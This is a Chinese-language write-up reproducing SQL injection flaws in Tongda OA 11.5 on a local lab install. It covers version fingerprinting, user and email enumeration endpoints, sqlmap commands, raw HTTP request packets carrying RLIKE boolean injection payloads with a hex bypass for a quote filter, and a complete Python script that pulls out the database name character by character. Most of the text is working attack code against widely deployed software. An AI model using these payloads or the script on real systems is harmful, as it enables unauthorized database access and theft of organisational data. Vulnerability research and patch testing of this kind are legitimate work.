通达OA 11.5 SQL注入漏洞复现

漏洞描述

通达OA 11.5存在sql注入

漏洞影响版本

通达oa 11.5
判断通达oa版本：

http[s]://TongDaOA.domain/inc/expired.php 判断通达版本
http[s]://TongDaOA.domain/inc/reg_trial.php
http[s]://TongDaOA.domain/inc/reg_trial_submit.php
http[s]://TongDaOA.domain/ispirit/retrieve_pwd.php
GET 参数username、email 可爆用户、邮箱
http[s]://TongDaOA.domain/resque/worker.php 计算机名

/inc/expired.php

/resque/worker.php

本地复现

首先下载通达OA 11.5，https://cdndown.tongda2000.com/oa/2019/TDOA11.5.exe

安装好后使用 admin 空密码 登录

然后新建一个普通用户 test:test123456，登录test账户

漏洞点1 id参数（布尔盲注和时间盲注）

id参数存在sql注入，位置/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2，使用sqlmap进行注入

python sqlmap.py -u "http://192.168.43.129/general/appbuilder/web/report/repdetail/edit?link_type=false&slot={}&id=2" -p "id" --cookie "PHPSESSID=3v2mhf591c0jsq3kq8tba98q57; USER_NAME_COOKIE=test; OA_USER_ID=65; SID_65=f4586f66; _csrf=4c3bd17849ec492e8d49a4eb7ec85dc614f22fb1195264aee25c341f17953e2da%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22g-FcCpSREk0gavd50I0nIYzAhtkCzRrg%22%3B%7D" --batch --is-dba

漏洞点2 starttime参数（时间盲注）

利用条件：一枚普通账号登录权限，但测试发现，某些低版本也无需登录也可注入
位置：/general/appbuilder/web/calendar/calendarlist/getcallist
数据包

GET /general/appbuilder/web/calendar/calendarlist/getcallist HTTP/1.1
Host: 192.168.43.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=hdjbtbc1p2qr9tav02th3ebqu7; USER_NAME_COOKIE=test1; OA_USER_ID=65; SID_65=e6f0418; _csrf=2165a3174ba8ffd85322e6723e6deebc10a1f5b63d322bb1dc03f2f8afc5acbca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%226LtDoOtdrUIANavkiSKXnW19CC47gdLi%22%3B%7D; SID_1=df1aabe7
Upgrade-Insecure-Requests: 1

starttime=1&endtime=1598918400&view=month&condition=1

使用sqlmap进行测试，python sqlmap.py -r .\test.txt --batch --dbs

漏洞点3 orderby参数

利用条件：一枚普通账号登录权限，但测试发现，某些低版本也无需登录也可注入

位置一，/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3&pagelimit=10&tag=&timestamp=1598069103&total=

位置二，/general/email/inbox/get_index_data.php?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=&pagelimit=10&tag=&timestamp=1598069103&total=

这里使用rlike()报错注入，rlike()是regerp_like()的同义词。rlike遇到特殊字符(和)报错，于是表达式输出1正常回显，表达式错误即输出特殊字符，报错。这里还过滤了单引号，使用16进制绕过，(即为0x28。

如下测试语句

3 RLIKE (SELECT (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))	# 1=1为真，输出1，正常回显
3 RLIKE (SELECT (CASE WHEN (1=2) THEN 1 ELSE 0x28 END))	# 1=2为假，输出0x28，0x28为特殊字符报错

1=1，正常回显

1=2，输出特殊符号0x28，报错

写了一个脚本来自动注入

import requests
import urllib
url = 'http://192.168.43.129/general/email/inbox/get_index_data.php'
cookies = "USER_NAME_COOKIE=test1; SID_65=569f697c; SID_1=df1aabe7; PHPSESSID=e4kdfoeb9r9gc5v486uno0nm15; OA_USER_ID=65; _csrf=2165a3174ba8ffd85322e6723e6deebc10a1f5b63d322bb1dc03f2f8afc5acbca%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%226LtDoOtdrUIANavkiSKXnW19CC47gdLi%22%3B%7D"
sql = '(select database())'
flag = ''
for i in range(1, 50):
    high = 132
    low = 32
    mid = (high+low)//2
    while high > low:
        char = flag+chr(mid)
        headers = {
            "cookie": urllib.parse.unquote(cookies)
        }
        target = url + "?asc=0&boxid=&boxname=inbox&curnum=0&emailtype=ALLMAIL&keyword=&orderby=3 RLIKE (SELECT (CASE " \
                    "WHEN (substr({0},{1},1)>={2}) THEN 1 ELSE 0x28 " \
                    "END))&pagelimit=10&tag=&timestamp=1598069103&total= ".format(sql, i, hex(mid))
        # print(target)
        s = requests.get(url=target, headers=headers)
        # print(s.text)
        if 'timestamp' in s.text:
            low = mid+1
        else:
            high = mid
        mid = (high+low)//2
        if mid == 33 or mid ==132:
            exit(0)
    flag += chr(mid-1)
    print("[+] "+flag)

用户名为rOOt@::1

数据库为tDzOA

漏洞点4 SORT_ID，FILE_SORT参数

利用条件：11.5版本无需登录

位置：/general/file_folder/swfupload_new.php
参数：SORT_ID，FILE_SORT

数据包

POST /general/file_folder/swfupload_new.php HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36
Referer: http://192.168.202.1/general/meeting/myapply/details.php?affair=true&id=5&nosign=true&reminding=true
X-Resource-Type: xhr
Connection: close
Host: 192.168.77.137
Pragma: no-cache
x-requested-with: XMLHttpRequest
Content-Length: 433
x-wvs-id: Acunetix-Deepscan/186
Cache-Control: no-cache
accept: */*
origin: http://192.168.202.1
Accept-Language: en-US
Content-Type: multipart/form-data; boundary=----------GFioQpMK0vv2

------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_ID"

1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="ATTACHMENT_NAME"

1
------------GFioQpMK0vv2
Content-Disposition: form-data; name="FILE_SORT"

2
------------GFioQpMK0vv2
Content-Disposition: form-data; name="SORT_ID"

0 RLIKE (SELECT  (CASE WHEN (1=1) THEN 1 ELSE 0x28 END))
------------GFioQpMK0vv2--

这里复现失败